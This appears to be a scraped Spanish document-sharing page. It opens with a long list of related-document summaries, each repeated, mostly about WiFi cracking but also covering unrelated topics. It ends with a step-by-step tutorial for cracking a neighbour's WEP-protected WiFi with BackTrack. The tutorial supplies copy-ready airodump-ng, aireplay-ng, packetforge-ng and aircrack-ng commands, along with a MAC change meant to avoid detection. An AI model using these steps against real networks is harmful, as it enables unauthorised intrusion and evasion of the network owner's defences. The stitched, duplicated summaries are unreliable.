Este documento proporciona instrucciones detalladas para hackear una red WiFi protegida con WEP mediante el uso de herramientas como airodump-ng, aireplay-ng y aircrack-ng. Explica cómo cambiar la dirección MAC, monitorear las redes, inyectar tráfico para capturar paquetes, y descifrar la clave WEP al encontrarla.
El documento proporciona instrucciones para crackear claves WEP usando BackTrack. Primero se pone la interfaz inalámbrica en modo monitor y se escanean las redes disponibles. Luego se capturan paquetes de una red específica usando su BSSID y canal. Finalmente, se usa el archivo capturado con aircrack-ng para descifrar la clave WEP.
Este documento proporciona instrucciones en 15 pasos para hackear una red WiFi, incluyendo cómo encontrar la interfaz de red inalámbrica, cambiar la dirección MAC, monitorear las redes disponibles, capturar paquetes de una red objetivo, e intentar crackear su contraseña usando varios comandos de la línea de comandos como airmon-ng, ifconfig, airodump-ng, aireplay-ng y aircrack-ng.
Este documento introduce la herramienta Minicom, la cual permite configurar dispositivos como routers y switches a través de una consola en Linux. Explica cómo instalar Minicom usando el comando "apt-get install minicom" y cómo iniciarlo tecleando "minicom". Detalla que al iniciarlo nos indica presionar Ctrl+A y luego Z para ver el menú de comandos, y cómo configurar la puerta serial cambiando el número en /dev/tty para establecer la conexión con el dispositivo.
Este documento introduce la herramienta Minicom, la cual permite configurar dispositivos como routers y switches a través de una consola en Linux. Explica cómo instalar Minicom usando el comando apt-get install minicom y cómo iniciarlo. También describe cómo acceder al menú de comandos usando Ctrl + A y Z y cómo configurar las opciones de comunicación de la puerta serial cambiando el número en /dev/tty para establecer la conexión con el dispositivo.
Este documento introduce la herramienta Minicom, la cual permite configurar dispositivos como routers y switches a través de una consola en Linux. Explica cómo instalar Minicom usando el comando apt-get install minicom y cómo iniciarlo para acceder a un menú de comandos usando Ctrl+A y luego Z. También describe cómo configurar las opciones de comunicación de Minicom seleccionando la configuración de la puerta serial y probando diferentes números como /dev/tty0, 1, 2, etc. para establecer la conexión con el dispositivo.
Este documento proporciona una introducción al uso de la herramienta Minicom en Linux para configurar dispositivos de red como routers y switches a través de una consola. Explica cómo instalar Minicom, iniciarlo y acceder al menú de comandos usando Ctrl + A y Z. También describe cómo configurar la puerta serial en /dev/tty0 u otros números en caso de que no se establezca la conexión.
MINICOM es una herramienta para configurar dispositivos como routers y switches a través de una consola en Linux. Se instala con el comando "apt-get install minicom" y se inicia con "minicom", mostrando un menú de comandos accesible con Ctrl+A y Z. Se configura la puerta serial cambiando el número en /dev/tty8 hasta conectar con el dispositivo.
Este documento trata sobre los protocolos de redes de computadoras. Explica que un protocolo es un conjunto de reglas que permiten que dos computadoras se comuniquen. Menciona algunos de los protocolos más importantes y cómo estos pueden ser objeto de ataques. También describe brevemente cómo funciona el protocolo Telnet para conectarse a una máquina remota.
El documento proporciona instrucciones para crackear claves WEP usando BackTrack. Primero se pone la interfaz inalámbrica en modo monitor y se escanean las redes disponibles. Luego se capturan paquetes de una red específica usando su BSSID y canal. Finalmente, se usa el archivo capturado con aircrack-ng para descifrar la clave WEP.
Este documento proporciona instrucciones en 15 pasos para hackear una red WiFi, incluyendo cómo encontrar la interfaz de red inalámbrica, cambiar la dirección MAC, monitorear las redes disponibles, capturar paquetes de una red objetivo, e intentar crackear su contraseña usando varios comandos de la línea de comandos como airmon-ng, ifconfig, airodump-ng, aireplay-ng y aircrack-ng.
Este documento introduce la herramienta Minicom, la cual permite configurar dispositivos como routers y switches a través de una consola en Linux. Explica cómo instalar Minicom usando el comando "apt-get install minicom" y cómo iniciarlo tecleando "minicom". Detalla que al iniciarlo nos indica presionar Ctrl+A y luego Z para ver el menú de comandos, y cómo configurar la puerta serial cambiando el número en /dev/tty para establecer la conexión con el dispositivo.
Este documento introduce la herramienta Minicom, la cual permite configurar dispositivos como routers y switches a través de una consola en Linux. Explica cómo instalar Minicom usando el comando apt-get install minicom y cómo iniciarlo. También describe cómo acceder al menú de comandos usando Ctrl + A y Z y cómo configurar las opciones de comunicación de la puerta serial cambiando el número en /dev/tty para establecer la conexión con el dispositivo.
Este documento introduce la herramienta Minicom, la cual permite configurar dispositivos como routers y switches a través de una consola en Linux. Explica cómo instalar Minicom usando el comando apt-get install minicom y cómo iniciarlo para acceder a un menú de comandos usando Ctrl+A y luego Z. También describe cómo configurar las opciones de comunicación de Minicom seleccionando la configuración de la puerta serial y probando diferentes números como /dev/tty0, 1, 2, etc. para establecer la conexión con el dispositivo.
Este documento proporciona una introducción al uso de la herramienta Minicom en Linux para configurar dispositivos de red como routers y switches a través de una consola. Explica cómo instalar Minicom, iniciarlo y acceder al menú de comandos usando Ctrl + A y Z. También describe cómo configurar la puerta serial en /dev/tty0 u otros números en caso de que no se establezca la conexión.
MINICOM es una herramienta para configurar dispositivos como routers y switches a través de una consola en Linux. Se instala con el comando "apt-get install minicom" y se inicia con "minicom", mostrando un menú de comandos accesible con Ctrl+A y Z. Se configura la puerta serial cambiando el número en /dev/tty8 hasta conectar con el dispositivo.
Este documento trata sobre los protocolos de redes de computadoras. Explica que un protocolo es un conjunto de reglas que permiten que dos computadoras se comuniquen. Menciona algunos de los protocolos más importantes y cómo estos pueden ser objeto de ataques. También describe brevemente cómo funciona el protocolo Telnet para conectarse a una máquina remota.
Este documento proporciona instrucciones para usar Wifiway 2.0.1, un programa Linux que permite hackear redes WiFi desprotegidas mediante el uso de aircrack-ng. Las instrucciones incluyen iniciar Wifiway, configurar la tarjeta de red inalámbrica en modo monitor, escanear redes WiFi cercanas, seleccionar una red objetivo, lanzar ataques de autenticación falsa para capturar paquetes de datos, y luego usar esos datos para crackear las contraseñas de las redes seleccionadas
Este documento proporciona instrucciones para configurar routers y switches en Packet Tracer, incluyendo cómo acceder a los modos de usuario y privilegiado, configurar nombres, direcciones IP e interfaces, establecer contraseñas y agregar rutas estáticas y RIP.
El documento describe cómo crackear la encriptación WEP débil mediante el uso de herramientas como Aircrack-ng. Explica que WEP tiene vulnerabilidades debido a su clave corta y reutilización de vectores de inicialización, lo que permite recolectar paquetes y descifrar la clave en 5-15 minutos. Recomienda usar en su lugar protocolos más seguros como WPA/WPA2.
Este documento proporciona información sobre la Universidad Tecnológica del Sur de Sonora. Incluye herramientas y pasos para crackear redes wifi como aircrack-ng y airodump-ng, así como enlaces a conferencias de seguridad en México.
Este documento describe cómo usar Backtrack5 para identificar vulnerabilidades en redes WiFi protegidas con WEP y crackear sus contraseñas en menos de 10 minutos. Explica los tipos de encriptación WEP, WPA y WPA2, y los pasos para configurar una tarjeta de red inalámbrica en modo monitor, escanear redes, grabar paquetes de datos e inyectar tráfico para crackear las contraseñas usando aircrack-ng.
Este documento proporciona una guía detallada sobre el uso básico y avanzado de RCON para administrar y configurar servidores de Counter-Strike. Explica los comandos RCON más utilizados para cambiar mapas, modificar contraseñas, enviar mensajes, reiniciar rondas, configurar límites de tiempo y rondas, y habilitar/deshabilitar funciones como el daño amigo o la comunicación por voz. También cubre comandos avanzados para banear jugadores, direcciones IP y gestionar logs y registros del serv
Estos documentos proporcionan comandos para la línea de comandos (cmd) en sistemas Windows, incluidos comandos para apagar o reiniciar la PC, cambiar contraseñas, restringir acceso a funciones y bloquear el uso no autorizado del sistema.
Juego de Informática Invasión a la Torre. Los virus y Cythrex quieren invadir la torre del conocimiento informático. Tienes que acabar con ellos respondiendo correctamente las preguntas sobre informática.
Si aciertas la pregunta tus disparos irán contra los virus pro si fallas serán ellos los que te atacarán. Saldrás vencedor de cada batalla y si tienes más conocimientos que los virus.
Tienes 3 niveles de dificultad para elegir las preguntas. Puedes empezar por el fácil.
Este documento se presentan las estructuras utilizadas en los algoritmos en lenguaje ensamblador. Por ejemplo como es el IF , FOR, BUCLE ANIDADO , WHILE ,entre otros ...
Este documento proporciona una guía detallada sobre el uso avanzado del escáner de puertos Nmap. Explica los diferentes tipos de escaneos como SYN scan y ping scan, así como opciones como detección de sistema operativo y uso de señuelos. También muestra cómo crear un escaneo personalizado combinando diferentes opciones según las necesidades del usuario, como un escaneo half-open que incluya barrido ACK y detección de sistema operativo de un rango de puertos específicos. El documento concluye animando a los lectores a
Este documento describe 5 maneras de averiguar la contraseña de acceso de un router. La primera es visitar un sitio web que proporciona contraseñas predeterminadas para diferentes marcas de routers. Otras opciones incluyen usar contraseñas comunes como "admin", revisar la etiqueta física del router, llamar al proveedor de servicios de internet o invertir la dirección MAC del router para generar una contraseña.
This document lists the titles of various documents related to biographies and prophets. It includes the title "Ang Talambuhay Ng Propeta" which means "The Biography of the Prophet" in Tagalog, along with other titles in Tagalog and English such as "Sanaysay na mga guho" which means "Essay on Ruins", "Kataga ng Buhay" which means "Phrase of Life", and "Do Not Despise Prophecies". The document provides the titles, authors if included, and number of views for each listed document.
O documento discute as competências legais sobre recursos hídricos e água no Brasil. A Constituição Federal de 1988 menciona tanto "água" quanto "recursos hídricos", deixando uma zona cinzenta de interpretação. A Lei 9.433/1997 que criou o Sistema Nacional de Gerenciamento de Recursos Hídricos foca nos recursos hídricos, sugerindo uma visão mais econômica. Isso levanta debates sobre o equilíbrio entre usos econômicos e proteção ambiental da água.
Este documento proporciona recursos para crear un sitio web, incluyendo enlaces para aprender sobre programación PHP, bases de datos y diseño de páginas web. Menciona que con estos enlaces se puede hacer lo necesario para crear la página web y diseñarla en un sitio que permita interactuar con Flash. También recomienda crear primero una tabla de base de datos para alumnos y usar programación PHP para actualizar la información.
El documento describe los antecedentes y consecuencias de la Alemania nazi y su influencia en la Segunda Guerra Mundial. Explica cómo el partido nazi ganó poder en Alemania aprovechando la pobreza y desempleo después de la Primera Guerra Mundial. Hitler expandió agresivamente el territorio alemán, iniciando la Segunda Guerra Mundial en 1939. La guerra resultó en decenas de millones de muertes y el establecimiento de Naciones Unidas para prevenir futuros conflictos.
El primer poema describe una tierra rodeada de colinas llenas de flora y riqueza natural. Aunque a veces es despreciada u olvidada, esta tierra está llena de belleza humana y flores, convirtiéndola en un verdadero tesoro a pesar de su nombre poco llamativo. El segundo poema describe la tierra como un lugar de libertad y belleza natural, con paisajes mágicos de montañas, cielo y cascadas que traen paz y felicidad.
Este documento proporciona instrucciones para usar Wifiway 2.0.1, un programa Linux que permite hackear redes WiFi desprotegidas mediante el uso de aircrack-ng. Las instrucciones incluyen iniciar Wifiway, configurar la tarjeta de red inalámbrica en modo monitor, escanear redes WiFi cercanas, seleccionar una red objetivo, lanzar ataques de autenticación falsa para capturar paquetes de datos, y luego usar esos datos para crackear las contraseñas de las redes seleccionadas
Este documento proporciona instrucciones para configurar routers y switches en Packet Tracer, incluyendo cómo acceder a los modos de usuario y privilegiado, configurar nombres, direcciones IP e interfaces, establecer contraseñas y agregar rutas estáticas y RIP.
El documento describe cómo crackear la encriptación WEP débil mediante el uso de herramientas como Aircrack-ng. Explica que WEP tiene vulnerabilidades debido a su clave corta y reutilización de vectores de inicialización, lo que permite recolectar paquetes y descifrar la clave en 5-15 minutos. Recomienda usar en su lugar protocolos más seguros como WPA/WPA2.
Este documento proporciona información sobre la Universidad Tecnológica del Sur de Sonora. Incluye herramientas y pasos para crackear redes wifi como aircrack-ng y airodump-ng, así como enlaces a conferencias de seguridad en México.
Este documento describe cómo usar Backtrack5 para identificar vulnerabilidades en redes WiFi protegidas con WEP y crackear sus contraseñas en menos de 10 minutos. Explica los tipos de encriptación WEP, WPA y WPA2, y los pasos para configurar una tarjeta de red inalámbrica en modo monitor, escanear redes, grabar paquetes de datos e inyectar tráfico para crackear las contraseñas usando aircrack-ng.
Este documento proporciona una guía detallada sobre el uso básico y avanzado de RCON para administrar y configurar servidores de Counter-Strike. Explica los comandos RCON más utilizados para cambiar mapas, modificar contraseñas, enviar mensajes, reiniciar rondas, configurar límites de tiempo y rondas, y habilitar/deshabilitar funciones como el daño amigo o la comunicación por voz. También cubre comandos avanzados para banear jugadores, direcciones IP y gestionar logs y registros del serv
Estos documentos proporcionan comandos para la línea de comandos (cmd) en sistemas Windows, incluidos comandos para apagar o reiniciar la PC, cambiar contraseñas, restringir acceso a funciones y bloquear el uso no autorizado del sistema.
Juego de Informática Invasión a la Torre. Los virus y Cythrex quieren invadir la torre del conocimiento informático. Tienes que acabar con ellos respondiendo correctamente las preguntas sobre informática.
Si aciertas la pregunta tus disparos irán contra los virus pro si fallas serán ellos los que te atacarán. Saldrás vencedor de cada batalla y si tienes más conocimientos que los virus.
Tienes 3 niveles de dificultad para elegir las preguntas. Puedes empezar por el fácil.
Este documento se presentan las estructuras utilizadas en los algoritmos en lenguaje ensamblador. Por ejemplo como es el IF , FOR, BUCLE ANIDADO , WHILE ,entre otros ...
Este documento proporciona una guía detallada sobre el uso avanzado del escáner de puertos Nmap. Explica los diferentes tipos de escaneos como SYN scan y ping scan, así como opciones como detección de sistema operativo y uso de señuelos. También muestra cómo crear un escaneo personalizado combinando diferentes opciones según las necesidades del usuario, como un escaneo half-open que incluya barrido ACK y detección de sistema operativo de un rango de puertos específicos. El documento concluye animando a los lectores a
Este documento describe 5 maneras de averiguar la contraseña de acceso de un router. La primera es visitar un sitio web que proporciona contraseñas predeterminadas para diferentes marcas de routers. Otras opciones incluyen usar contraseñas comunes como "admin", revisar la etiqueta física del router, llamar al proveedor de servicios de internet o invertir la dirección MAC del router para generar una contraseña.
This document lists the titles of various documents related to biographies and prophets. It includes the title "Ang Talambuhay Ng Propeta" which means "The Biography of the Prophet" in Tagalog, along with other titles in Tagalog and English such as "Sanaysay na mga guho" which means "Essay on Ruins", "Kataga ng Buhay" which means "Phrase of Life", and "Do Not Despise Prophecies". The document provides the titles, authors if included, and number of views for each listed document.
O documento discute as competências legais sobre recursos hídricos e água no Brasil. A Constituição Federal de 1988 menciona tanto "água" quanto "recursos hídricos", deixando uma zona cinzenta de interpretação. A Lei 9.433/1997 que criou o Sistema Nacional de Gerenciamento de Recursos Hídricos foca nos recursos hídricos, sugerindo uma visão mais econômica. Isso levanta debates sobre o equilíbrio entre usos econômicos e proteção ambiental da água.
Este documento proporciona recursos para crear un sitio web, incluyendo enlaces para aprender sobre programación PHP, bases de datos y diseño de páginas web. Menciona que con estos enlaces se puede hacer lo necesario para crear la página web y diseñarla en un sitio que permita interactuar con Flash. También recomienda crear primero una tabla de base de datos para alumnos y usar programación PHP para actualizar la información.
El documento describe los antecedentes y consecuencias de la Alemania nazi y su influencia en la Segunda Guerra Mundial. Explica cómo el partido nazi ganó poder en Alemania aprovechando la pobreza y desempleo después de la Primera Guerra Mundial. Hitler expandió agresivamente el territorio alemán, iniciando la Segunda Guerra Mundial en 1939. La guerra resultó en decenas de millones de muertes y el establecimiento de Naciones Unidas para prevenir futuros conflictos.
El primer poema describe una tierra rodeada de colinas llenas de flora y riqueza natural. Aunque a veces es despreciada u olvidada, esta tierra está llena de belleza humana y flores, convirtiéndola en un verdadero tesoro a pesar de su nombre poco llamativo. El segundo poema describe la tierra como un lugar de libertad y belleza natural, con paisajes mágicos de montañas, cielo y cascadas que traen paz y felicidad.
Este documento explica cómo crackear las claves WEP, WPA y WPA2 utilizando Backtrack 3 y la suite Aircrack. Primero se pone la tarjeta inalámbrica en modo monitor y se escanean las redes. Luego se capturan paquetes de la red objetivo y se inyectan paquetes para obtener la clave WEP. Para WPA/WPA2, se desautentifica a un cliente conectado para capturar el handshake y crackear la contraseña usando un diccionario. El documento concluye con consejos para proteger una red inalá
Este documento proporciona una introducción a los comandos básicos de Aircrack-ng, una suite de programas para auditar redes inalámbricas. Explica cómo preparar la tarjeta de red para el modo monitor, escanear redes y clientes asociados, inyectar paquetes para agilizar la captura, y crackear las claves WEP mediante el análisis de los paquetes capturados. Además, advierte que usar estos programas para acceder a redes ajenas sin permiso es ilegal.
Este documento explica cómo crackear las claves WEP, WPA y WPA2 utilizando Backtrack 3 y la suite Aircrack. Primero se pone la tarjeta inalámbrica en modo monitor y luego se usa Airodump-ng para capturar paquetes de la red objetivo. Para WEP, Aireplay-ng se usa para autenticaciones falsas e inyección de paquetes ARP, y luego Aircrack-ng para crackear la clave. Para WPA/WPA2, se desautentifica a un cliente conectado para capturar el handshake y luego Aircrack
Para los que quieren saber como funciona el Airdump de kali linux, y como es posible descifrar claves de wifi, nosrmalmente ahora con WPA2 es un poco mas tedioso, aunque no imposible. Para empezar a entender el airdump, y poder prevenir estos ataques, chequear esta guia
Para realizar esta guia,se recomienda descargar kali linux directamente de su pagina, asi tendremos la ultima vericion de este SO tambien de sus aplicaciones.
https://www.kali.org/downloads/
Este documento describe cómo hackear una red inalámbrica protegida con WEP utilizando herramientas como Wifislax, Kismet, airodump-ng y aircrack-ng. Primero se pone la tarjeta inalámbrica en modo monitor usando Wifislax. Luego, Kismet se usa para ver el nombre de la red, la MAC, el canal y el tipo de encriptación. Con estos datos, airodump-ng captura paquetes en el canal de la red objetivo. A continuación, aireplay-ng inyecta tráfico para
El documento explica qué es WEP, un sistema de encriptación para redes inalámbricas que es inseguro. Describe cómo usar el programa Aircrack-ng para monitorear redes wifi, inyectar tráfico e interceptar paquetes con el fin de crackear la clave WEP de una red y descifrar su encriptación. Se recomienda usar en su lugar el más seguro estándar WPA-2 para proteger las redes wifi.
El documento presenta los 5 pasos fundamentales para realizar un ataque de fuerza bruta para crackear las claves WPA/WPA2 de una red inalámbrica: 1) usar iwconfig para verificar la interfaz de red, 2) usar airmon-ng para poner la interfaz en modo monitor, 3) usar airodump-ng para capturar paquetes, 4) usar aireplay-ng para inyectar paquetes, y 5) usar aircrack-ng para crackear la clave mediante fuerza bruta usando los paquetes capturados.
Este documento proporciona instrucciones básicas para configurar y usar Wifislax, una herramienta educativa para auditar redes WiFi de forma segura. Explica cómo configurar la BIOS para arrancar desde un CD de Wifislax, iniciar sesión en el entorno gráfico, escanear redes WiFi cercanas con Airoscript, seleccionar una red objetivo, lanzar un ataque de asociación falsa automático para capturar paquetes IV, y usar Aircrack para crackear la clave WPA usando un diccion
Instalación de raptorcache en debían 7. Por ADLLorenzo
El documento describe cómo instalar y configurar RaptorCache en Debian 7 para crear un servidor proxy transparente con dos tarjetas de red. Incluye instrucciones para instalar Debian, descargar e instalar el script de RaptorCache, configurar las interfaces de red, habilitar el enrutamiento y NAT, e instalar dnsmasq y wondershaper para controlar el ancho de banda.
BackTrack 3 es una distribución GNU/Linux diseñada para la auditoría de seguridad e incluye herramientas para escaneo de puertos, análisis forense y auditoría inalámbrica. El documento proporciona instrucciones para obtener contraseñas WEP usando BackTrack 3, incluyendo cómo configurar una unidad USB con BackTrack 3, usar comandos como airodump-ng y aireplay-ng para capturar paquetes de una red inalámbrica objetivo y usar aircrack-ng para crackear la contraseña WEP.
Este documento describe los pasos realizados en una práctica de hacking usando Backtrack 2. Se utilizaron las herramientas netcat, lanmap2 y nmap para realizar reconocimiento de red e identificar hosts. Luego, se exploraron vulnerabilidades en Windows 7 y XP usando Metasploit. Finalmente, se instaló un backdoor, habilitó escritorio remoto y un keylogger en la máquina objetivo.
Este documento describe cómo usar la herramienta airmon-ng para activar el modo monitor en tarjetas inalámbricas. Airmon-ng se puede usar para iniciar o detener el modo monitor en una interfaz especificada, opcionalmente en un canal específico. Se proporcionan ejemplos como iniciar wlan0 en el canal 8 en modo monitor y detener wlan0. También se describen consideraciones como confirmar el modo monitor usando iwconfig y hacer que el canal de la tarjeta coincida con el del punto de acceso para capturar paquetes.
Este documento proporciona instrucciones para crackear redes WEP mediante el uso de herramientas como Aircrack-ng y airodump-ng. Explica cómo poner la tarjeta wifi en modo monitor, capturar paquetes WEP, y utilizar técnicas como el ARP-request reinjection attack para acelerar el proceso de crackeo y descubrir la clave WEP con menos paquetes capturados. Advierta que este documento solo debe usarse con fines educativos y no para acceder a redes sin permiso.
Este documento describe cómo crear VLANs en PFsense utilizando una sola interfaz de red. Explica los pasos para instalar PFsense, configurar las VLANs en la interfaz y mediante la administración web de PFsense, y asignar interfaces a cada VLAN. Luego, detalla cómo configurar las VLANs en un switch Cisco 2960 asignando puertos a cada VLAN, y pruebas de conexión entre las VLANs.
El documento proporciona un tutorial básico para usar Wifislax, una distribución Linux live para auditoría wifi. Explica cómo configurar el ordenador para arrancar desde un CD de Wifislax, iniciar sesión, activar el modo monitor de la tarjeta wifi, escanear redes inalámbricas con Airoscript, seleccionar una red objetivo, lanzar un ataque de asociación falsa automático para capturar paquetes IV, y usar Aircrack para crackear la clave WPA/WPA2 con un diccionario.
Este documento proporciona instrucciones para obtener la contraseña wifi de una red sin protección en Ubuntu 10.04. Explica cómo instalar aircrack-ng, poner la tarjeta de red en modo monitor, capturar paquetes de la señal wifi objetivo usando airodump-ng, y luego usar aircrack-ng para descifrar la contraseña al abrir el archivo de paquetes capturados.
BackTrack 3 es una distribución Linux diseñada para la auditoría de seguridad que incluye herramientas para escaneo de puertos, análisis forense y auditoría inalámbrica. El documento proporciona instrucciones para descargar e instalar BackTrack 3 en un USB y usarlo para capturar paquetes Wi-Fi y descifrar claves WEP usando airodump-ng, aireplay-ng y aircrack-ng.
Este documento explica cómo usar Kali Linux para crackear una contraseña WEP de una red WiFi de manera no autorizada. Describe los pasos para poner la tarjeta inalámbrica en modo monitor, capturar paquetes de la red objetivo, asociarse a la red, generar tráfico mediante reinyección ARP y usar aircrack-ng para descifrar la contraseña WEP analizando los paquetes capturados. El autor advierte que este método solo debe usarse para auditoría de seguridad con fines educativos y no para acceder a redes ajenas
El documento describe varias formas de escanear puertos abiertos en una red y vulnerar sistemas. Se menciona escanear puertos comunes como 80 y 22, así como puertos menos conocidos con herramientas como nmap y zenmap. También describe usar exploits de Metasploit apuntando al puerto 445 para obtener acceso no autorizado a sistemas Windows.
1. cuando te pida usuario y contraseña usa los siguientes:
Usuario: root
Contraseña: toor
Introducelo todo en minusculas
Luego cuando ya todo cargue escribe lo siguiente:
startx
Esto es para que se inicie el modo grafico.
Cuando escuches el sonido de Mortal Kombat un "Finish Him!" es que ya cargo y esta listo para ser
utilizado.
Bueno ahora viene lo bueno, abre una ventana de terminal (o consola) y escribe lo siguiente:
airmon-ng
Aqui te va a decir cual es tu tarjeta inalambrica, lo normal es que salga wlan0, o eth0, o eth1, cosas
asi por el estilo, tu te vas a dar cuenta de cual es, en mi caso es la wlan0.
Luego introduce los siguientes comandos:
airmon-ng stop wlan0
ifconfig wlan0 down
Con esto deshabilitas la tarjeta de red inalambrica para hacerle un cambio de mac, este con dos
razones importantes: 1. Para que asi no haya problemas de que te puedan detectar e impedirte
futuras conexiones y 2. Vas a necesitar el numero de mac mas adelante y esta es una facil de
escribir y recordar.
Para cambiar la mac escribe los sigueintes comandos:
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Con el primer comando se cambio la mac de tu tarjeta de red por 00:11:22:33:44:55 y con el
segundo habilitaste nuevamente tu tarjeta de red inalambrica (puede tardar un poco este ultimo
comando)
Ahora vas a proceder a ver las redes inalambricas que estan a tu alcance con el siguiente
comando:
airodump-ng wlan0
Va a salir la lista de las redes inalambricas, donde dice el BSSID (mac del router que da la señal),
PWR (Poder de señal), CHN (Canal que se encuentra la red), ENCR (Es el tipo de contraseña que
tiene la red, este tutorial es solo para WEP) y ESSID (Nombre de la red inalambrica).
Se que son mas datos los que se muestran, pero esos no son de importancia, solo vamos a utilizar
los que mencione.
Cuando selecciones la red inalambrica que vamos a atacar apreta Ctrl + C para parar el proceso y
2. con el mouse sombrea todo el BSSID de esa red y dale click derecho y copiar.
Para explicar bien esta parte vamos a poner un ejemplo:
BSSID
66:77:88:99:00:11
CHN
6
ESSID
ejemplo
Ahora para ponernos de modo monitor (para capturar paquetes) de esa red pon el siguiente
comando:
airodump-ng -c 6 -w prueba --bssid 66:77:88:99:00:11 wlan0
Donde:
-c es el numero del canal de la red que estamos atacando
-w es el archivo donde se van a guardar los paquetes que captures (por defecto estan en la
direccion /root)
--bssid es la mac del router de la red que estamos atacando
wlan0 es nuestra tarjeta inalambrica
Ahora que ya estas capturando datos veras que hay una parte que dice DATA, estos son los
paquetes que llevamos capturados, para poder descifrar una wep es necesario 20,000 paquetes.
Te daras cuenta que puede ir muy lento, esto significa que ninguna persona esta utilizando la red
entonces no esta generando trafico y te podria llevar dias llegar a los 20,000 paquetes, pero no te
preocupes que ahora te enseñare como generar trafico en la red.
Para inyectarle trafico a la red abre otra terminal (consola) donde introduciras los siguientes
comandos:
aireplay-ng -1 0 -a 66:77:88:99:00:11 -h 00:11:22:33:44:55 -e ejemplo wlan0
Donde:
-a es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
-e es el nombre de la red que estamos atacando
Luego cuando salgan 4 lineas de codigos y te diga que la conexion esta succesfuld, esto significa
que estas conectado en capa 2 al router de la red que estamos atacando.
Si por alguna razon no se puede conectar algunas de las razones son las siguientes:
-La red a la que quieres atacar esta muy lejos
-Tu tarjeta de red no puede hacer inyeccion de paquetes
-El router tiene seguridad para evitar este tipo de ataques
Ahora para inyectarle el trafico introducce el siguientes comando:
aireplay-ng -3 -b 66:77:88:99:00:11 -h 00:11:22:33:44:55 wlan0
Donde:
3. -b es el bssid de la red que estamos atacando
-h es la mac falsa que le introducimos a tu tarjeta de red inalambrica
Veras que que se empezaron a inyectar paquetes, si vas a ver a la otra terminal donde estas
capturando los paquetes te daras cuenta que la DATA va caminando muy rapido.
Ahora abre otra terminal (consola) e introduce el siguiente comando:
aircrack-ng prueba-01.cap
Donde:
-Prueba-01.cap es el archivo donde se estan capturando los datos
Deja que el comando se ejecute hasta que te diga un mensaje KEY FOUND!!, esto significa que la
contraseña se a descifrado, y te la mostrara al lado derecho de la siguiente forma:
[XX:XX:XX:XX:XX:XX]
Donde las XX son las letras o numeros de la contraseña, por ejemplo:
Si te muestra [12:34:56:78:90]
La contraseña para esa red inalambrica seria 1234567890.
Bueno para aquellos que quieren probar aqui les pongo todos los comandos en el orden que debe
de ser para que solo le den copiar:
# airmon-ng
# airmon-ng stop wlan0
# ifconfig wlan0 down
# macchanger –mac 00:11:22:33:44:55 wlan0
# airmon-ng start wlan0
# airodump-ng wlan0
# airodump-ng -c (numero del canal) -w nombrearchivo –bssid (bssid) wlan0
# aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) wlan0
# aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
# aircrack-ng nombredelarchivo.cap
Como se daran cuenta son pocos comandos pero llevan mucha explicacion y lo trate de hacer de
una forma entendible, ya estoy trabajando en el video, asi que no se preocupen si no entienden,
pronto voy a sacar el video donde igual voy a explicar los pasos.
Para aquellos que quieren probar otras formas de inyeccion aqui les dejo otras dos formas que me
han funcionado perfecto:
Forma 2:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -h (MAC) wlan0
Verificar si el BSSID es el que estamos atacando
4. Forma 3:
# aireplay-ng -1 0 -a <bssid> -h <mac> -e <essid> wlan0
# aireplay-ng -5 -b <BSSID> -h <mac> wlan0
ver como se llama el archivo .xor
# packetforge-ng -0 -a <BSSID> -h <mac> -k 255.255.255.255 -l 255.255.255.255 -y <archivo .xor> -
w ARP
# aireplay-ng -2 -r ARP wlan0